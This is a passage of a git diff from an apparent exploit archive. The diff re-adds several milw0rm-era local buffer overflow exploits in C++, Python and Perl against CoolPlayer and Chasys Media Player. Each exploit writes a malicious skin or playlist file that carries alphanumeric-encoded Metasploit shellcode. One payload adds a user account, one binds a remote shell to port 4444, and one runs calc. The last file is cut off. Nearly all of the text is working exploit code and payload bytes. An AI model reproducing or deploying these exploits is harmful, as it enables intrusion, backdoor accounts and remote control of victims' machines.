"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x30\x4b\x54" + "\x4b\x38\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58" + "\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43" + "\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x33\x45\x58\x42\x4c\x4a\x47" + "\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x38\x42\x47\x4e\x31\x4d\x4a" + "\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b" + "\x42\x50\x42\x50\x42\x30\x4b\x38\x4a\x36\x4e\x53\x4f\x35\x41\x53" + "\x48\x4f\x42\x46\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57" + "\x42\x45\x4a\x46\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x46\x4a\x39" + "\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46" + "\x4e\x36\x43\x46\x50\x32\x45\x46\x4a\x37\x45\x46\x42\x30\x5a"; + + char buffer[1918]; + char eip[] = "\x27\x38\x03\x7d"; //jmp esp + + cout << "[*] Generating payload\n"; + strcpy(buffer, "[CoolPlayer Skin]\nPlaylistSkin="); + + int i; + for (i=0; i<1534; i++) + buffer[31+i] = 'A'; + + for (i=0; i<sizeof(eip); i++) + buffer[1565+i] = eip[i]; + + for (i=0; i<sizeof(scode); i++) + buffer[1569+i] = scode[i]; + + ofstream outStream; + outStream.open("cp.ini"); + + outStream << buffer; + + outStream.close(); + + cout << "[+] Skin file created.\n"; + + return 0; +} + +// milw0rm.com [2008-12-21] diff --git a/platforms/windows/local/7547.py b/platforms/windows/local/7547.py index 6e233683a..13464c96a 100755 --- a/platforms/windows/local/7547.py +++ b/platforms/windows/local/7547.py 
@@ -1,64 +1,64 @@ -# CoolPlayer (Skin) Buffer Overflow -# maybe all versions are affected :) -# By:Encrypt3d.M!nd -# -# Orginal Exploit: by r0ut3r -# http://www.milw0rm.com/exploits/7536 -# -# i've test it on my box(winxp sp3) and didn't work -# so i've re-wrote the exploit and this is workin -# tested: Windows xp sp3 patched -# version tested:2.17,2.18,2.19 -# -# Greetz:-=Mizo=-,L!0n,El Mariachi,MiNi SpIder,GGy,and all my friends -################################################### - -chars = "A"*1511 - -eip = "\x6B\x8C\x49\x7E" #user32.dll jmp esp - -header = "[CoolPlayer Skin]\nPlaylistSkin=" - - -# win32_adduser - PASS=t35t EXITFUNC=seh USER=t35t Size=489 -Encoder=PexAlphaNum http://metasploit.com -shellcode = ( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" -"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x57" -"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38" -"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38" -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c" -"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x33\x46\x45\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x58" -"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34" -"\x4b\x58\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58" -"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43" -"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x43\x45\x38\x42\x4c\x4a\x37" -"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a" -"\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b" -"\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x33\x4f\x35\x41\x33" 
-"\x48\x4f\x42\x56\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47" -"\x42\x35\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x36\x4a\x49" -"\x50\x4f\x4c\x48\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x46\x4d\x46" -"\x46\x36\x50\x42\x45\x36\x4a\x37\x45\x56\x42\x52\x4f\x42\x43\x56" -"\x42\x42\x50\x36\x45\x46\x46\x57\x42\x52\x45\x47\x43\x47\x45\x46" -"\x44\x37\x42\x32\x46\x47\x43\x43\x45\x43\x46\x57\x42\x52\x46\x47" -"\x43\x43\x45\x33\x46\x47\x42\x42\x4f\x32\x41\x34\x46\x54\x46\x54" -"\x42\x52\x48\x42\x48\x32\x42\x42\x50\x46\x45\x36\x46\x57\x42\x32" -"\x4e\x36\x4f\x56\x43\x46\x41\x36\x4e\x36\x47\x56\x44\x37\x4f\x36" -"\x45\x37\x42\x37\x42\x32\x41\x44\x46\x46\x4d\x56\x49\x56\x50\x56" -"\x49\x46\x43\x57\x46\x57\x44\x57\x41\x56\x46\x37\x4f\x46\x44\x37" -"\x43\x57\x42\x42\x46\x37\x43\x33\x45\x53\x46\x47\x42\x52\x4f\x52" -"\x41\x54\x46\x34\x46\x34\x42\x50\x5a"); - -poc = (header+chars+eip+"\x90"*10+shellcode) - -file = open('skin.ini','w+') -file.write(poc) -file.close() - -# milw0rm.com [2008-12-22] +# CoolPlayer (Skin) Buffer Overflow +# maybe all versions are affected :) +# By:Encrypt3d.M!nd +# +# Orginal Exploit: by r0ut3r +# http://www.milw0rm.com/exploits/7536 +# +# i've test it on my box(winxp sp3) and didn't work +# so i've re-wrote the exploit and this is workin +# tested: Windows xp sp3 patched +# version tested:2.17,2.18,2.19 +# +# Greetz:-=Mizo=-,L!0n,El Mariachi,MiNi SpIder,GGy,and all my friends +################################################### + +chars = "A"*1511 + +eip = "\x6B\x8C\x49\x7E" #user32.dll jmp esp + +header = "[CoolPlayer Skin]\nPlaylistSkin=" + + +# win32_adduser - PASS=t35t EXITFUNC=seh USER=t35t Size=489 +Encoder=PexAlphaNum http://metasploit.com +shellcode = ( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" 
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" +"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x57" +"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38" +"\x4f\x45\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38" +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c" +"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x33\x46\x45\x46\x52\x46\x50\x45\x47\x45\x4e\x4b\x58" +"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34" +"\x4b\x58\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58" +"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43" +"\x42\x4c\x46\x56\x4b\x58\x42\x54\x42\x43\x45\x38\x42\x4c\x4a\x37" +"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x37\x4e\x41\x4d\x4a" +"\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b" +"\x42\x50\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x33\x4f\x35\x41\x33" +"\x48\x4f\x42\x56\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47" +"\x42\x35\x4a\x36\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x36\x4a\x49" +"\x50\x4f\x4c\x48\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x46\x4d\x46" +"\x46\x36\x50\x42\x45\x36\x4a\x37\x45\x56\x42\x52\x4f\x42\x43\x56" +"\x42\x42\x50\x36\x45\x46\x46\x57\x42\x52\x45\x47\x43\x47\x45\x46" +"\x44\x37\x42\x32\x46\x47\x43\x43\x45\x43\x46\x57\x42\x52\x46\x47" +"\x43\x43\x45\x33\x46\x47\x42\x42\x4f\x32\x41\x34\x46\x54\x46\x54" +"\x42\x52\x48\x42\x48\x32\x42\x42\x50\x46\x45\x36\x46\x57\x42\x32" +"\x4e\x36\x4f\x56\x43\x46\x41\x36\x4e\x36\x47\x56\x44\x37\x4f\x36" +"\x45\x37\x42\x37\x42\x32\x41\x44\x46\x46\x4d\x56\x49\x56\x50\x56" +"\x49\x46\x43\x57\x46\x57\x44\x57\x41\x56\x46\x37\x4f\x46\x44\x37" +"\x43\x57\x42\x42\x46\x37\x43\x33\x45\x53\x46\x47\x42\x52\x4f\x52" +"\x41\x54\x46\x34\x46\x34\x42\x50\x5a"); + +poc = (header+chars+eip+"\x90"*10+shellcode) + +file = open('skin.ini','w+') +file.write(poc) +file.close() + +# milw0rm.com [2008-12-22] 
diff --git a/platforms/windows/local/7692.pl b/platforms/windows/local/7692.pl index f27ac0358..6bf5576d6 100755 --- a/platforms/windows/local/7692.pl +++ b/platforms/windows/local/7692.pl 
@@ -1,95 +1,95 @@ -#!/usr/bin/perl -# coolplayer_bof.pl -# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] -# -# CoolPlayer BUILD 219 'PlaylistSkin' Buffer Overflow Exploit -# http://coolplayer.sourceforge.net -# -# TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING -# -# C:\Documents and Settings\Administrator> telnet localhost 4444 -# ..... -# Microsoft Windows 2000 [Version 5.00.2195] -# (C) Copyright 1985-2000 Microsoft Corp. -# -# ANDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD -# -# Microsoft Windows XP [Version 5.1.2600] -# (C) Copyright 1985-2001 Microsoft Corp. -# -# Some fun, good 'ole win32 smashing.. bada-bing bada-boom! - -$header = "[CoolPlayer Skin]\nPlaylistSkin="; - -$win2ksp4 = 0x77E4307B; # user32.dll JMP ESP -$winxpsp3 = 0x7E498C6B; # user32.dll JMP ESP - - # Win32 Portbind Shellcode (pexalphanum/metasploit,port=4444) -$shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" . - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" . - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" . - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" . - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" . - "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48" . - "\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x54\x4e\x33\x4b\x38\x4e\x37" . - "\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48" . - "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58" . - "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" . - "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" . - "\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48" . - "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54" . - "\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38" . - "\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d" . - "\x46\x46\x4b\x58\x43\x44\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48" . 
- "\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x35\x4a\x36" . - "\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56" . - "\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x57\x43\x57" . - "\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" . - "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e" . - "\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30" . - "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" . - "\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x45\x43\x44" . - "\x43\x35\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x31" . - "\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x56\x46\x4a" . - "\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51" . - "\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32" . - "\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d" . - "\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d" . - "\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46" . - "\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45" . - "\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x46\x4a\x46\x43\x56" . - "\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x42\x4e\x4c" . - "\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x38\x44\x4e\x41\x33\x42\x4c" . - "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x44\x4e\x32" . - "\x43\x39\x4d\x38\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" . - "\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f" . - "\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x35\x4c\x56" . - "\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56" . - "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36" . - "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" . - "\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" . - "\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x35\x4f\x4f\x48\x4d" . 
- "\x4f\x4f\x42\x4d\x5a"; - -$filename = $ARGV[0]; -$target = $ARGV[1]; - -if(!defined($filename) || !defined($target)) -{ - - print "Usage: $0 <filename.ini> [1=win2ksp4/2=winxpsp3]\n"; - -} - -if($target == "1") { $retaddr = pack('l', $win2ksp4); } -if($target == "2") { $retaddr = pack('l', $winxpsp3); } - -$payload = $header . $retaddr x 377 . $shellcode; # 377 * 4 = 1508 - - open(FILE, '>' . $filename); - print FILE $payload; - close(FILE); - -exit; - -# milw0rm.com [2009-01-07] +#!/usr/bin/perl +# coolplayer_bof.pl +# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] +# +# CoolPlayer BUILD 219 'PlaylistSkin' Buffer Overflow Exploit +# http://coolplayer.sourceforge.net +# +# TCP 0.0.0.0:4444 0.0.0.0:0 LISTENING +# +# C:\Documents and Settings\Administrator> telnet localhost 4444 +# ..... +# Microsoft Windows 2000 [Version 5.00.2195] +# (C) Copyright 1985-2000 Microsoft Corp. +# +# ANDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD +# +# Microsoft Windows XP [Version 5.1.2600] +# (C) Copyright 1985-2001 Microsoft Corp. +# +# Some fun, good 'ole win32 smashing.. bada-bing bada-boom! + +$header = "[CoolPlayer Skin]\nPlaylistSkin="; + +$win2ksp4 = 0x77E4307B; # user32.dll JMP ESP +$winxpsp3 = 0x7E498C6B; # user32.dll JMP ESP + + # Win32 Portbind Shellcode (pexalphanum/metasploit,port=4444) +$shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" . + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" . + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" . + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" . + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" . + "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48" . + "\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x54\x4e\x33\x4b\x38\x4e\x37" . + "\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48" . + "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58" . 
+ "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" . + "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" . + "\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48" . + "\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54" . + "\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38" . + "\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d" . + "\x46\x46\x4b\x58\x43\x44\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48" . + "\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x35\x4a\x36" . + "\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56" . + "\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x57\x43\x57" . + "\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" . + "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e" . + "\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30" . + "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" . + "\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x45\x43\x44" . + "\x43\x35\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x31" . + "\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x56\x46\x4a" . + "\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51" . + "\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32" . + "\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d" . + "\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d" . + "\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46" . + "\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45" . + "\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x46\x4a\x46\x43\x56" . + "\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x42\x4e\x4c" . + "\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x38\x44\x4e\x41\x33\x42\x4c" . + "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x44\x4e\x32" . + "\x43\x39\x4d\x38\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" . 
+ "\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f" . + "\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x35\x4c\x56" . + "\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56" . + "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36" . + "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" . + "\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" . + "\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x35\x4f\x4f\x48\x4d" . + "\x4f\x4f\x42\x4d\x5a"; + +$filename = $ARGV[0]; +$target = $ARGV[1]; + +if(!defined($filename) || !defined($target)) +{ + + print "Usage: $0 <filename.ini> [1=win2ksp4/2=winxpsp3]\n"; + +} + +if($target == "1") { $retaddr = pack('l', $win2ksp4); } +if($target == "2") { $retaddr = pack('l', $winxpsp3); } + +$payload = $header . $retaddr x 377 . $shellcode; # 377 * 4 = 1508 + + open(FILE, '>' . $filename); + print FILE $payload; + close(FILE); + +exit; + +# milw0rm.com [2009-01-07] diff --git a/platforms/windows/local/8233.py b/platforms/windows/local/8233.py index 62de32585..6f43db34d 100755 --- a/platforms/windows/local/8233.py +++ b/platforms/windows/local/8233.py 
@@ -1,62 +1,62 @@ -#usage: exploit.py -print "**************************************************************************" -print " Chasys Media Player(pls File) Local Stack overflow Exploit\n" -print " Founder: zAx my friend :)" -print " Exploited by : His0k4" -print " Tested on: Windows XP Pro SP2 Fr\n" -print " Good news : The program didn't crash after running the exploit :)" -print " Greetings to:" -print " All friends & muslims HaCkers(dz)\n" -print "**************************************************************************" - - - -header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A" -header += "\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74" -header += "\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65" -header += "\x31\x3D" - - -buff1 = "\x41" * 260 - -eip = "\x5D\x38\x82\x7C" # call esp kernel32.dll - - -# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -shellcode=( -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" -"\x42\x30\x42\x30\x42\x30\x4b\x58\x45\x34\x4e\x33\x4b\x48\x4e\x37" -"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x38" -"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x53\x4b\x58" -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c" -"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" -"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x48" -"\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x50\x4b\x34" -"\x4b\x38\x4f\x55\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x31\x4b\x38" -"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x53" -"\x42\x4c\x46\x36\x4b\x48\x42\x54\x42\x43\x45\x38\x42\x4c\x4a\x57" 
-"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x31\x4d\x4a" -"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x38\x42\x4b" -"\x42\x30\x42\x30\x42\x50\x4b\x58\x4a\x56\x4e\x33\x4f\x55\x41\x53" -"\x48\x4f\x42\x36\x48\x45\x49\x58\x4a\x4f\x43\x58\x42\x4c\x4b\x47" -"\x42\x55\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x36\x4a\x59" -"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56" -"\x4e\x36\x43\x36\x42\x50\x5a") - - - -exploit = header + buff1 + eip + shellcode # klimontayne fe romayne :D - -try: - out_file = open("exploit.pls",'w') - out_file.write(exploit) - out_file.close() - print "Exploit File Created!" -except: - print "Error" - -# milw0rm.com [2009-03-18] +#usage: exploit.py +print "**************************************************************************" +print " Chasys Media Player(pls File) Local Stack overflow Exploit\n" +print " Founder: zAx my friend :)" +print " Exploited by : His0k4" +print " Tested on: Windows XP Pro SP2 Fr\n" +print " Good news : The program didn't crash after running the exploit :)" +print " Greetings to:" +print " All friends & muslims HaCkers(dz)\n" +print "**************************************************************************" + + + +header = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0A" +header += "\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45\x6E\x74" +header += "\x72\x69\x65\x73\x3D\x31\x0A\x46\x69\x6C\x65" +header += "\x31\x3D" + + +buff1 = "\x41" * 260 + +eip = "\x5D\x38\x82\x7C" # call esp kernel32.dll + + +# win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +shellcode=( +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" 
